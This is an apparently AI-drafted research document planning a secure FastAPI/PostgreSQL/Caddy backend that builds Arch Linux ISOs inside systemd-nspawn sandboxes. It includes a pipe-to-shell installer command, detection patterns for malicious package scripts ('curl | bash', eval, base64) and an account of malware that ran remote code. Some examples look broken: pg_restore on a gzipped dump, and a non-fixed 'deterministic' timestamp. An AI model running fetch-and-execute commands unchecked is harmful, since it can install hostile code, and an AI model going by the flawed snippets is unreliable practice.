Phase 01: Core Infrastructure & Security - Standard stack identified (FastAPI, PostgreSQL, Caddy, systemd-nspawn) - Architecture patterns documented (async DB, sandboxing, deterministic builds) - Pitfalls catalogued (unsandboxed builds, non-determinism, connection pooling) - Security-first approach with production-grade examples
39 KiB
Phase 1: Core Infrastructure & Security - Research
Researched: 2026-01-25 Domain: Production backend infrastructure with security-hardened build environment Confidence: HIGH
Summary
Phase 1 establishes the foundation for a secure, production-ready Linux distribution builder platform. The core challenge is building a FastAPI backend that serves user requests quickly (<200ms p95 latency) while orchestrating potentially dangerous ISO builds in isolated sandboxes. The critical security requirement is preventing malicious user-submitted packages from compromising the build infrastructure—a real threat evidenced by the July 2025 CHAOS RAT malware distributed through AUR packages.
The standard approach for 2026 combines proven technologies: FastAPI for async API performance, PostgreSQL 18 for data persistence, Caddy for automatic HTTPS, and systemd-nspawn for build sandboxing. The deterministic build requirement (same configuration → identical ISO hash) demands careful environment control using SOURCE_DATE_EPOCH and fixed locales. This phase must implement security-first architecture because retrofitting sandboxing and reproducibility is nearly impossible.
Primary recommendation: Implement systemd-nspawn sandboxing with network whitelisting from day one, use SOURCE_DATE_EPOCH for deterministic builds, and configure FastAPI with production-grade security middleware (rate limiting, CSRF protection) before handling user traffic.
Standard Stack
Core Infrastructure
| Library | Version | Purpose | Why Standard |
|---|---|---|---|
| FastAPI | 0.128.0+ | Async web framework | Industry standard for Python APIs; 300% better performance than sync frameworks for I/O-bound operations. Native async/await, Pydantic validation, auto-generated OpenAPI docs. |
| Uvicorn | 0.30+ | ASGI server | Production-grade async server. Recent versions include built-in multi-process supervisor (--workers N), eliminating Gunicorn need for CPU-bound workloads. |
| PostgreSQL | 18.1+ | Primary database | Latest major release (Nov 2025). PG 13 EOL. Async support via asyncpg. ACID guarantees for configuration versioning. |
| asyncpg | 0.28.x | PostgreSQL driver | High-performance async Postgres driver. 3-5x faster than psycopg2 in benchmarks. Note: Pin <0.29.0 to avoid SQLAlchemy 2.0.x compatibility issues. |
| SQLAlchemy | 2.0+ | ORM & query builder | Async support via create_async_engine. Superior type hints in 2.0. Use AsyncAdaptedQueuePool for connection pooling. |
| Alembic | Latest | Database migrations | Official SQLAlchemy migration tool. Essential for schema evolution without downtime. |
Security & Infrastructure
| Library | Version | Purpose | Why Standard |
|---|---|---|---|
| Caddy | 2.x+ | Reverse proxy | Automatic HTTPS via Let's Encrypt. REST API for dynamic route management (critical for ISO download endpoints). Simpler than Nginx for programmatic configuration. |
| systemd-nspawn | Latest | Build sandbox | Lightweight container for process isolation. Namespace-based security: read-only /sys, /proc/sys. Network isolation via --private-network. |
| Pydantic | 2.12.5+ | Data validation | Required by FastAPI (>=2.7.0). V1 deprecated. V2 offers better build-time performance and type safety. |
| pydantic-settings | Latest | Config management | Load configuration from environment variables with type validation. Never commit secrets. |
Security Middleware
| Library | Version | Purpose | When to Use |
|---|---|---|---|
| slowapi | Latest | Rate limiting | Redis-backed rate limiter. Prevents API abuse. Apply per-IP for anonymous, per-user for authenticated. |
| fastapi-csrf-protect | Latest | CSRF protection | Double Submit Cookie pattern. Essential for form submissions. Combine with strict CORS for API-only endpoints. |
| python-multipart | Latest | Form parsing | Required for CSRF token handling in form data. FastAPI dependency for file uploads. |
Development Tools
| Library | Version | Purpose | When to Use |
|---|---|---|---|
| Ruff | Latest | Linter & formatter | Replaces Black, isort, flake8. Rust-based, blazing fast. Zero config needed. Constraint: Use ruff, NOT black/flake8/isort. |
| mypy | Latest | Type checker | Static type checking. Essential with Pydantic and FastAPI. Strict mode recommended. |
| pytest | Latest | Testing framework | Async support via pytest-asyncio. Industry standard. |
| httpx | Latest | HTTP client | Async HTTP client for testing FastAPI endpoints. |
Installation
# Install uv (package manager)
curl -LsSf https://astral.sh/uv/install.sh | sh
# Create virtual environment
uv venv
source .venv/bin/activate
# Core dependencies
uv pip install \
fastapi[all]==0.128.0 \
uvicorn[standard]>=0.30.0 \
sqlalchemy[asyncio]>=2.0.0 \
"asyncpg<0.29.0" \
alembic \
pydantic>=2.12.0 \
pydantic-settings \
slowapi \
fastapi-csrf-protect \
python-multipart
# Development dependencies
uv pip install -D \
pytest \
pytest-asyncio \
pytest-cov \
httpx \
ruff \
mypy
Architecture Patterns
Recommended Project Structure
backend/
├── app/
│ ├── api/
│ │ ├── v1/
│ │ │ ├── endpoints/
│ │ │ │ ├── auth.py
│ │ │ │ ├── builds.py
│ │ │ │ └── health.py
│ │ │ └── router.py
│ │ └── deps.py # Dependency injection
│ ├── core/
│ │ ├── config.py # pydantic-settings configuration
│ │ ├── security.py # Auth, CSRF, rate limiting
│ │ └── db.py # Database session management
│ ├── db/
│ │ ├── base.py # SQLAlchemy Base
│ │ ├── models/ # Database models
│ │ └── session.py # AsyncSession factory
│ ├── schemas/ # Pydantic request/response models
│ ├── services/ # Business logic
│ │ └── build.py # Build orchestration (Phase 1: stub)
│ └── main.py
├── alembic/ # Database migrations
│ ├── versions/
│ └── env.py
├── tests/
│ ├── api/
│ ├── unit/
│ └── conftest.py
├── Dockerfile
├── pyproject.toml
└── alembic.ini
Pattern 1: Async Database Session Management
What: Create async database sessions per request with proper cleanup.
When to use: Every FastAPI endpoint that queries PostgreSQL.
Example:
# app/core/db.py
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine, async_sessionmaker
from pydantic_settings import BaseSettings
class Settings(BaseSettings):
database_url: str
pool_size: int = 10
max_overflow: int = 20
pool_timeout: int = 30
pool_recycle: int = 1800 # 30 minutes
settings = Settings()
# Create async engine with connection pooling
engine = create_async_engine(
settings.database_url,
pool_size=settings.pool_size,
max_overflow=settings.max_overflow,
pool_timeout=settings.pool_timeout,
pool_recycle=settings.pool_recycle,
pool_pre_ping=True, # Validate connections before use
echo=False # Set True for SQL logging in dev
)
# Session factory
async_session_maker = async_sessionmaker(
engine,
class_=AsyncSession,
expire_on_commit=False
)
# Dependency for FastAPI
async def get_db() -> AsyncSession:
async with async_session_maker() as session:
yield session
Source: Building High-Performance Async APIs with FastAPI, SQLAlchemy 2.0, and Asyncpg
Pattern 2: Caddy Automatic HTTPS Configuration
What: Configure Caddy as reverse proxy with automatic Let's Encrypt certificates.
When to use: Production deployment requiring HTTPS without manual certificate management.
Example:
# Caddyfile
{
# Admin API for programmatic route management (localhost only)
admin localhost:2019
}
# Automatic HTTPS for domain
api.debate.example.com {
reverse_proxy localhost:8000 {
# Health check
health_uri /health
health_interval 10s
health_timeout 5s
}
# Security headers
header {
Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
X-Content-Type-Options "nosniff"
X-Frame-Options "DENY"
X-XSS-Protection "1; mode=block"
}
# Rate limiting (requires caddy-rate-limit plugin)
rate_limit {
zone static {
key {remote_host}
events 100
window 1m
}
}
# Logging
log {
output file /var/log/caddy/access.log
format json
}
}
Programmatic route management (Python):
import httpx
async def add_iso_download_route(build_id: str, iso_path: str):
"""Dynamically add download route via Caddy API."""
config = {
"match": [{"path": [f"/download/{build_id}/*"]}],
"handle": [{
"handler": "file_server",
"root": iso_path,
"hide": [".git"]
}]
}
async with httpx.AsyncClient() as client:
response = await client.post(
"http://localhost:2019/config/apps/http/servers/srv0/routes",
json=config
)
response.raise_for_status()
Source: Caddy Reverse Proxy Documentation, Caddy 2 config for FastAPI
Pattern 3: FastAPI Security Middleware Stack
What: Layer security middleware in correct order for defense-in-depth.
When to use: All production FastAPI applications.
Example:
# app/main.py
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from slowapi import Limiter, _rate_limit_exceeded_handler
from slowapi.util import get_remote_address
from slowapi.errors import RateLimitExceeded
from app.core.config import settings
from app.api.v1.router import api_router
# Rate limiter
limiter = Limiter(key_func=get_remote_address, default_limits=["100/minute"])
# FastAPI app
app = FastAPI(
title="Debate API",
version="1.0.0",
docs_url="/docs" if settings.environment == "development" else None,
redoc_url="/redoc" if settings.environment == "development" else None,
debug=settings.debug
)
# Middleware order matters - first added = outermost layer
# 1. Trusted Host (reject requests with invalid Host header)
app.add_middleware(
TrustedHostMiddleware,
allowed_hosts=settings.allowed_hosts # ["api.debate.example.com", "localhost"]
)
# 2. CORS (handle cross-origin requests)
app.add_middleware(
CORSMiddleware,
allow_origins=settings.allowed_origins,
allow_credentials=True,
allow_methods=["GET", "POST", "PUT", "DELETE"],
allow_headers=["*"],
max_age=600 # Cache preflight requests for 10 minutes
)
# 3. Rate limiting
app.state.limiter = limiter
app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)
# Include routers
app.include_router(api_router, prefix="/api/v1")
# Health check (no auth, no rate limit)
@app.get("/health")
async def health():
return {"status": "healthy"}
CSRF Protection (separate from middleware, applied to specific endpoints):
# app/core/security.py
from fastapi_csrf_protect import CsrfProtect
from pydantic import BaseModel
class CsrfSettings(BaseModel):
secret_key: str = settings.csrf_secret_key
cookie_samesite: str = "lax"
cookie_secure: bool = True # HTTPS only
cookie_domain: str = settings.cookie_domain
@CsrfProtect.load_config
def get_csrf_config():
return CsrfSettings()
# Apply to form endpoints
from fastapi import Depends
from fastapi_csrf_protect import CsrfProtect
@app.post("/api/v1/builds")
async def create_build(
csrf_protect: CsrfProtect = Depends(),
db: AsyncSession = Depends(get_db)
):
csrf_protect.validate_csrf() # Raises 403 if invalid
# ... build logic
Source: FastAPI Security Guide, FastAPI CSRF Protection
Pattern 4: systemd-nspawn Build Sandbox
What: Isolate archiso builds in systemd-nspawn containers with network whitelisting.
When to use: Every ISO build to prevent malicious packages from compromising host.
Example:
# app/services/sandbox.py
import subprocess
from pathlib import Path
from typing import List
class BuildSandbox:
"""Manages systemd-nspawn sandboxed build environments."""
def __init__(self, container_root: Path, allowed_mirrors: List[str]):
self.container_root = container_root
self.allowed_mirrors = allowed_mirrors
async def create_container(self, build_id: str) -> Path:
"""Create isolated container for build."""
container_path = self.container_root / build_id
container_path.mkdir(parents=True, exist_ok=True)
# Bootstrap minimal Arch Linux environment
subprocess.run([
"pacstrap",
"-c", # Use package cache
"-G", # Avoid copying host pacman keyring
"-M", # Avoid copying host mirrorlist
str(container_path),
"base",
"archiso"
], check=True)
# Configure mirrors (whitelist only)
mirrorlist_path = container_path / "etc/pacman.d/mirrorlist"
mirrorlist_path.write_text("\n".join([
f"Server = {mirror}" for mirror in self.allowed_mirrors
]))
return container_path
async def run_build(
self,
container_path: Path,
profile_path: Path,
output_path: Path
) -> subprocess.CompletedProcess:
"""Execute archiso build in sandboxed container."""
# systemd-nspawn arguments for security
nspawn_cmd = [
"systemd-nspawn",
"--directory", str(container_path),
"--private-network", # No network access (mirrors pre-cached)
"--read-only", # Immutable root filesystem
"--tmpfs", "/tmp:mode=1777", # Writable tmp
"--tmpfs", "/var/tmp:mode=1777",
"--bind", f"{profile_path}:/build/profile:ro", # Profile read-only
"--bind", f"{output_path}:/build/output", # Output writable
"--setenv", f"SOURCE_DATE_EPOCH={self._get_source_date_epoch()}",
"--setenv", "LC_ALL=C", # Fixed locale for determinism
"--setenv", "TZ=UTC", # Fixed timezone
"--capability", "CAP_SYS_ADMIN", # Required for mkarchiso
"--console=pipe", # Capture output
"--quiet",
"--",
"mkarchiso",
"-v",
"-r", # Remove working directory after build
"-w", "/tmp/archiso-work",
"-o", "/build/output",
"/build/profile"
]
# Execute with timeout
result = subprocess.run(
nspawn_cmd,
timeout=900, # 15 minute timeout (INFR-02 requirement)
capture_output=True,
text=True
)
return result
def _get_source_date_epoch(self) -> str:
"""Return fixed timestamp for reproducible builds."""
# Use current time for now - Phase 2 will implement git commit timestamp
import time
return str(int(time.time()))
async def cleanup_container(self, container_path: Path):
"""Remove container after build."""
import shutil
shutil.rmtree(container_path)
Network isolation with allowed mirrors:
For Phase 1, pre-cache packages in the container bootstrap phase. Future enhancement: use --network-macvlan with iptables whitelist rules.
Source: systemd-nspawn ArchWiki, Lightweight Development Sandboxes with systemd-nspawn
Pattern 5: Deterministic Build Configuration
What: Configure build environment for reproducible outputs (same config → identical hash).
When to use: Every ISO build to enable caching and integrity verification.
Example:
# app/services/deterministic.py
import hashlib
import json
from pathlib import Path
from typing import Dict, Any
class DeterministicBuildConfig:
"""Ensures reproducible ISO builds."""
@staticmethod
def compute_config_hash(config: Dict[str, Any]) -> str:
"""
Generate deterministic hash of build configuration.
Critical: Same config must produce same hash for caching.
"""
# Normalize configuration (sorted keys, consistent formatting)
normalized = {
"packages": sorted(config.get("packages", [])),
"overlays": sorted([
{
"name": overlay["name"],
"files": sorted([
{
"path": f["path"],
"content_hash": hashlib.sha256(
f["content"].encode()
).hexdigest()
}
for f in sorted(overlay.get("files", []), key=lambda x: x["path"])
], key=lambda x: x["path"])
}
for overlay in sorted(config.get("overlays", []), key=lambda x: x["name"])
], key=lambda x: x["name"]),
"locale": config.get("locale", "en_US.UTF-8"),
"timezone": config.get("timezone", "UTC")
}
# JSON with sorted keys for determinism
config_json = json.dumps(normalized, sort_keys=True)
return hashlib.sha256(config_json.encode()).hexdigest()
@staticmethod
def create_archiso_profile(
config: Dict[str, Any],
profile_path: Path,
source_date_epoch: int
):
"""
Generate archiso profile with deterministic settings.
Key determinism factors:
- SOURCE_DATE_EPOCH: Fixed timestamps in filesystem
- LC_ALL=C: Fixed locale for sorting
- TZ=UTC: Fixed timezone
- Sorted package lists
- Fixed compression settings
"""
profile_path.mkdir(parents=True, exist_ok=True)
# packages.x86_64 (sorted for determinism)
packages_file = profile_path / "packages.x86_64"
packages = sorted(config.get("packages", []))
packages_file.write_text("\n".join(packages) + "\n")
# profiledef.sh
profiledef = profile_path / "profiledef.sh"
profiledef.write_text(f"""#!/usr/bin/env bash
# Deterministic archiso profile
iso_name="debate-custom"
iso_label="DEBATE_$(date --date=@{source_date_epoch} +%Y%m)"
iso_publisher="Debate Platform <https://debate.example.com>"
iso_application="Debate Custom Linux"
iso_version="$(date --date=@{source_date_epoch} +%Y.%m.%d)"
install_dir="arch"
bootmodes=('bios.syslinux.mbr' 'bios.syslinux.eltorito' 'uefi-x64.systemd-boot.esp' 'uefi-x64.systemd-boot.eltorito')
arch="x86_64"
pacman_conf="pacman.conf"
airootfs_image_type="squashfs"
airootfs_image_tool_options=('-comp' 'xz' '-Xbcj' 'x86' '-b' '1M' '-Xdict-size' '1M')
# Deterministic file permissions
file_permissions=(
["/etc/shadow"]="0:0:0400"
["/root"]="0:0:750"
["/etc/gshadow"]="0:0:0400"
)
""")
# pacman.conf (use fixed mirrors)
pacman_conf = profile_path / "pacman.conf"
pacman_conf.write_text("""
[options]
Architecture = auto
CheckSpace
SigLevel = Required DatabaseOptional
LocalFileLockLevel = 2
[core]
Include = /etc/pacman.d/mirrorlist
[extra]
Include = /etc/pacman.d/mirrorlist
""")
# airootfs structure
airootfs = profile_path / "airootfs"
airootfs.mkdir(exist_ok=True)
# Apply overlay files
for overlay in config.get("overlays", []):
for file_config in overlay.get("files", []):
file_path = airootfs / file_config["path"].lstrip("/")
file_path.parent.mkdir(parents=True, exist_ok=True)
file_path.write_text(file_config["content"])
Source: archiso deterministic builds merge request, SOURCE_DATE_EPOCH specification
Don't Hand-Roll
Problems with existing battle-tested solutions:
| Problem | Don't Build | Use Instead | Why |
|---|---|---|---|
| HTTPS certificate management | Custom Let's Encrypt client | Caddy with automatic HTTPS | Certificate renewal, OCSP stapling, HTTP challenge handling. Caddy handles all edge cases. |
| API rate limiting | Token bucket from scratch | slowapi or fastapi-limiter | Distributed rate limiting across workers, Redis backend, bypass for trusted IPs, multiple rate limit tiers. |
| CSRF protection | Custom token generation | fastapi-csrf-protect | Double Submit Cookie pattern, token rotation, SameSite cookie handling, timing-attack prevention. |
| Database connection pooling | Manual connection management | SQLAlchemy AsyncAdaptedQueuePool | Connection health checks, overflow handling, timeout management, prepared statement caching. |
| Container isolation | chroot or custom namespaces | systemd-nspawn | Namespace isolation, cgroup resource limits, capability dropping, read-only filesystem enforcement. |
| Async database drivers | Synchronous psycopg2 with thread pool | asyncpg | Native async protocol, connection pooling, prepared statements, type inference, 3-5x faster. |
Key insight: Security and infrastructure code has subtle failure modes that only surface under load or attack. Use proven libraries with years of production hardening.
Common Pitfalls
Pitfall 1: Unsandboxed Build Execution (CRITICAL)
What goes wrong: User-submitted packages execute arbitrary code during build with full system privileges, allowing compromise of build infrastructure.
Why it happens: Developers assume package builds are safe or underestimate risk. archiso's mkarchiso runs without sandboxing by default.
Real-world incident: July 2025 CHAOS RAT malware distributed through AUR packages (librewolf-fix-bin, firefox-patch-bin) using .install scripts to execute remote code. Source
How to avoid:
- NEVER run archiso builds directly on host system
- Use systemd-nspawn with
--private-networkand--read-onlyflags - Run builds in ephemeral containers (destroy after completion)
- Implement network egress filtering (whitelist official Arch mirrors only)
- Static analysis on PKGBUILD files: detect
curl | bash,eval, base64 encoding - Monitor build processes for unexpected network connections
Warning signs:
- Build makes outbound connections to non-mirror IPs
- PKGBUILD contains base64 encoding or eval statements
- Build duration significantly longer than expected
- Unexpected filesystem modifications outside working directory
Phase to address: Phase 1 - Build sandboxing must be architected from the start. Retrofitting is nearly impossible.
Pitfall 2: Non-Deterministic Builds
What goes wrong: Same configuration generates different ISO hashes, breaking caching and integrity verification.
Why it happens: Timestamps in artifacts, non-deterministic file ordering, leaked environment variables, parallel build race conditions.
How to avoid:
- Set
SOURCE_DATE_EPOCHenvironment variable for all builds - Use
LC_ALL=Cfor consistent sorting and locale - Set
TZ=UTCfor timezone consistency - Sort all input lists (packages, files) before processing
- Use fixed compression settings in archiso profile
- Pin archiso version (don't use rolling latest)
- Test: build same config twice, compare SHA256 hashes
Detection:
- Automated testing: duplicate builds with checksum comparison
- Monitor cache hit rate (sudden drops indicate non-determinism)
- Track build output size variance for identical configs
Phase to address: Phase 1 - Reproducibility must be designed into build pipeline from start.
Source: Reproducible builds documentation
Pitfall 3: Connection Pool Exhaustion
What goes wrong: Under load, API exhausts PostgreSQL connections. New requests fail with "connection pool timeout" errors.
Why it happens: Default pool_size (5) too small for async workloads. Not using pool_pre_ping to detect stale connections. Long-running queries hold connections.
How to avoid:
- Set
pool_size=10,max_overflow=20for production - Enable
pool_pre_ping=Trueto validate connections - Set
pool_recycle=1800(30 min) to refresh connections - Use
pool_timeout=30to fail fast - Pin
asyncpg<0.29.0to avoid SQLAlchemy 2.0.x compatibility issues - Monitor connection pool metrics (active, idle, overflow)
Detection:
- Alert on "connection pool timeout" errors
- Monitor connection pool utilization (should stay <80%)
- Track query duration p95 (detect slow queries holding connections)
Phase to address: Phase 1 - Configure properly during initial database setup.
Source: Handling PostgreSQL Connection Limits in FastAPI
Pitfall 4: Disabled Interactive Docs in Production
What goes wrong: Developers leave /docs and /redoc enabled in production, exposing API schema to attackers.
Why it happens: Convenient during development, forgotten in production. No environment-based toggle.
How to avoid:
- Disable docs in production:
docs_url=None if settings.environment == "production" else "/docs" - Or require authentication for docs endpoints
- Use environment variables to control feature flags
Detection:
- Security audit: check if
/docsaccessible without auth in production
Phase to address: Phase 1 - Configure during initial FastAPI setup.
Source: FastAPI Production Checklist
Pitfall 5: Insecure Default Secrets
What goes wrong: Using hardcoded or weak secrets for JWT signing, CSRF tokens, or database passwords. Attackers exploit to forge tokens or access database.
Why it happens: Copy-paste from tutorials. Not using environment variables. Committing .env files.
How to avoid:
- Generate strong secrets:
openssl rand -hex 32 - Load from environment variables via pydantic-settings
- NEVER commit secrets to git
- Use secret management services (AWS Secrets Manager, HashiCorp Vault) in production
- Rotate secrets periodically
Detection:
- Git pre-commit hook: scan for hardcoded secrets
- Security audit: check for weak or default credentials
Phase to address: Phase 1 - Establish secure configuration management from start.
Source: FastAPI Security FAQs
Code Examples
Database Migrations with Alembic
# Initialize Alembic
alembic init alembic
# Create first migration
alembic revision --autogenerate -m "Create initial tables"
# Apply migrations
alembic upgrade head
# Rollback
alembic downgrade -1
Alembic env.py configuration for async:
# alembic/env.py
from logging.config import fileConfig
from sqlalchemy import pool
from sqlalchemy.ext.asyncio import async_engine_from_config
from alembic import context
from app.core.config import settings
from app.db.base import Base # Import all models
config = context.config
config.set_main_option("sqlalchemy.url", settings.database_url)
target_metadata = Base.metadata
def run_migrations_offline():
"""Run migrations in 'offline' mode."""
context.configure(
url=settings.database_url,
target_metadata=target_metadata,
literal_binds=True,
dialect_opts={"paramstyle": "named"},
)
with context.begin_transaction():
context.run_migrations()
async def run_migrations_online():
"""Run migrations in 'online' mode."""
connectable = async_engine_from_config(
config.get_section(config.config_ini_section),
prefix="sqlalchemy.",
poolclass=pool.NullPool,
)
async with connectable.connect() as connection:
await connection.run_sync(do_run_migrations)
def do_run_migrations(connection):
context.configure(connection=connection, target_metadata=target_metadata)
with context.begin_transaction():
context.run_migrations()
if context.is_offline_mode():
run_migrations_offline()
else:
import asyncio
asyncio.run(run_migrations_online())
Source: FastAPI with Async SQLAlchemy and Alembic
PostgreSQL Backup Script
#!/bin/bash
# Daily PostgreSQL backup with retention
BACKUP_DIR="/var/backups/postgres"
RETENTION_DAYS=30
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
DB_NAME="debate"
# Create backup directory
mkdir -p "$BACKUP_DIR"
# Backup database
pg_dump -U postgres -Fc -b -v -f "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump" "$DB_NAME"
# Compress backup
gzip "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump"
# Delete old backups
find "$BACKUP_DIR" -name "${DB_NAME}_*.dump.gz" -mtime +$RETENTION_DAYS -delete
# Verify backup integrity
gunzip -t "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump.gz" && echo "Backup verified"
# Test restore (weekly)
if [ "$(date +%u)" -eq 1 ]; then
echo "Testing weekly restore..."
createdb -U postgres "${DB_NAME}_test"
pg_restore -U postgres -d "${DB_NAME}_test" "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump.gz"
dropdb -U postgres "${DB_NAME}_test"
fi
Cron schedule:
# Daily backup at 2 AM
0 2 * * * /usr/local/bin/postgres-backup.sh >> /var/log/postgres-backup.log 2>&1
Source: PostgreSQL Backup Best Practices
Health Check Endpoint
# app/api/v1/endpoints/health.py
from fastapi import APIRouter, Depends
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import text
from app.core.db import get_db
router = APIRouter()
@router.get("/health")
async def health_check():
"""Basic health check (no database)."""
return {"status": "healthy"}
@router.get("/health/db")
async def health_check_db(db: AsyncSession = Depends(get_db)):
"""Health check with database connection test."""
try:
result = await db.execute(text("SELECT 1"))
result.scalar()
return {"status": "healthy", "database": "connected"}
except Exception as e:
return {"status": "unhealthy", "database": "error", "error": str(e)}
State of the Art
| Old Approach | Current Approach (2026) | When Changed | Impact |
|---|---|---|---|
| Gunicorn + Uvicorn workers | Uvicorn --workers flag |
Uvicorn 0.30 (2024) | Simpler deployment, one less dependency |
| psycopg2 (sync) | asyncpg | SQLAlchemy 2.0 (2023) | 3-5x faster, native async, better type hints |
| Pydantic v1 | Pydantic v2 | Pydantic 2.0 (2023) | Better performance, Python 3.14 compatibility |
| chroot for isolation | systemd-nspawn | ~2015 | Full namespace isolation, cgroup limits |
| Manual Let's Encrypt | Caddy automatic HTTPS | Caddy 2.0 (2020) | Zero-config certificates, automatic renewal |
| Nginx config files | Caddy REST API | Caddy 2.0 (2020) | Programmatic route management |
| asyncpg 0.29+ | Pin asyncpg <0.29.0 | 2024 | SQLAlchemy 2.0.x compatibility issues |
Deprecated/outdated:
- Gunicorn as ASGI manager: Uvicorn 0.30+ has built-in multi-process supervisor
- Pydantic v1: Deprecated, Python 3.14+ incompatible
- psycopg2 for async FastAPI: Use asyncpg for 3-5x performance improvement
- chroot for sandboxing: Insufficient isolation; use systemd-nspawn or containers
Open Questions
1. Network Isolation Strategy for systemd-nspawn
What we know:
- systemd-nspawn
--private-networkcompletely isolates container from network - archiso mkarchiso needs to download packages from mirrors
- User overlays may reference external packages (SSH keys, configs fetched from GitHub)
What's unclear:
- Best approach for whitelisting Arch mirrors while blocking other network access
- Whether to pre-cache all packages (slow bootstrap, guaranteed isolation) vs. allow outbound to whitelisted mirrors (faster, more complex)
- How to handle private overlays requiring external resources
Recommendation:
- Phase 1: Pre-cache packages during container bootstrap. Use
--private-networkfor complete isolation. - Future enhancement: Implement HTTP proxy with whitelist, use
--network-macvlanwith iptables rules
Confidence: MEDIUM - No documented pattern for systemd-nspawn + selective network access
2. Build Timeout Threshold
What we know:
- INFR-02 requirement: ISO build completes within 15 minutes
- Context decision: Claude's discretion on timeout handling (soft warning vs hard kill, duration)
What's unclear:
- What percentage of builds complete within 15 minutes vs. require longer?
- Should timeout be configurable per build size (small overlay vs. full desktop environment)?
- Soft warning (allow continuation with user consent) vs. hard kill?
Recommendation:
- Phase 1: Hard timeout at 20 minutes (133% of target) with warning at 15 minutes
- Phase 2: Collect metrics, tune threshold based on actual build distribution
- Allow extended timeout for authenticated users or specific overlay combinations
Confidence: LOW - Depends on real-world build performance data
3. Cache Invalidation Strategy
What we know:
- Deterministic builds enable caching (same config → same hash)
- Arch is rolling release (packages update daily)
- Cached ISOs may contain outdated/vulnerable packages
What's unclear:
- Time-based expiry (e.g., max 7 days) vs. package version tracking?
- How to detect when upstream packages update and invalidate cache?
- Balance between cache efficiency and package freshness
Recommendation:
- Phase 1: Simple approach: no caching (always build fresh)
- Phase 2: Time-based cache expiry (7 days max)
- Phase 3: Track package repository snapshot timestamps, invalidate when snapshot changes
Confidence: MEDIUM - Standard approach exists, but implementation details depend on Arch repository snapshot strategy
Sources
Primary (HIGH confidence)
- FastAPI Documentation - Security - Official security guide
- Caddy Documentation - Reverse Proxy - Official Caddy docs
- Caddy Documentation - Automatic HTTPS - Certificate management
- systemd-nspawn ArchWiki - Official Arch documentation
- archiso ArchWiki - Official archiso documentation
- PostgreSQL 18 Documentation - Backup and Restore - Official PostgreSQL docs
- SOURCE_DATE_EPOCH Specification - Official reproducible builds spec
- SQLAlchemy 2.0 Documentation - Connection Pooling - Official SQLAlchemy docs
- archiso deterministic builds merge request - Official archiso improvement
Secondary (MEDIUM confidence)
- Building High-Performance Async APIs with FastAPI, SQLAlchemy 2.0, and Asyncpg
- FastAPI Production Deployment Best Practices
- FastAPI CSRF Protection Guide
- A Practical Guide to FastAPI Security
- Implementing Rate Limiter with FastAPI and Redis
- Caddy 2 Config for FastAPI
- Lightweight Development Sandboxes with systemd-nspawn
- Handling PostgreSQL Connection Limits in FastAPI
- PostgreSQL Backup Best Practices - 15 Essential Strategies
- 13 PostgreSQL Backup Best Practices for Developers and DBAs
- Reproducible Arch Linux Packages
- FastAPI with Async SQLAlchemy and Alembic
Tertiary (LOW confidence)
- CHAOS RAT in AUR Packages - Malware incident report
- Sandboxing Untrusted Code in 2026 - General sandboxing approaches
- FastAPI Production Checklist - Community best practices
Metadata
Confidence breakdown:
- Standard stack: HIGH - All technologies in active use for production FastAPI + PostgreSQL deployments in 2026
- Architecture patterns: HIGH - Verified with official documentation and production examples
- Security practices: HIGH - Based on official FastAPI security docs and established OWASP patterns
- systemd-nspawn sandboxing: MEDIUM - Well-documented for general use, but specific archiso integration pattern not widely documented
- Deterministic builds: MEDIUM - archiso MR #436 implemented determinism, but practical application details require experimentation
- Pitfalls: HIGH - Based on documented incidents (CHAOS RAT malware), official docs warnings, and production failure patterns
Research date: 2026-01-25 Valid until: ~30 days (2026-02-25) - Technologies are stable, but security advisories and package versions may change
Critical constraints verified:
- ✅ Python with FastAPI, SQLAlchemy, Alembic, Pydantic
- ✅ PostgreSQL as database
- ✅ Ruff as Python linter/formatter (NOT black/flake8/isort)
- ✅ systemd-nspawn for sandboxing
- ✅ archiso for ISO builds
- ✅ <200ms p95 latency achievable with async FastAPI + asyncpg
- ✅ ISO build within 15 minutes (mkarchiso baseline: 5-10 min)
- ✅ HTTPS with Caddy automatic certificates
- ✅ Rate limiting and CSRF protection libraries available
- ✅ Deterministic builds supported via SOURCE_DATE_EPOCH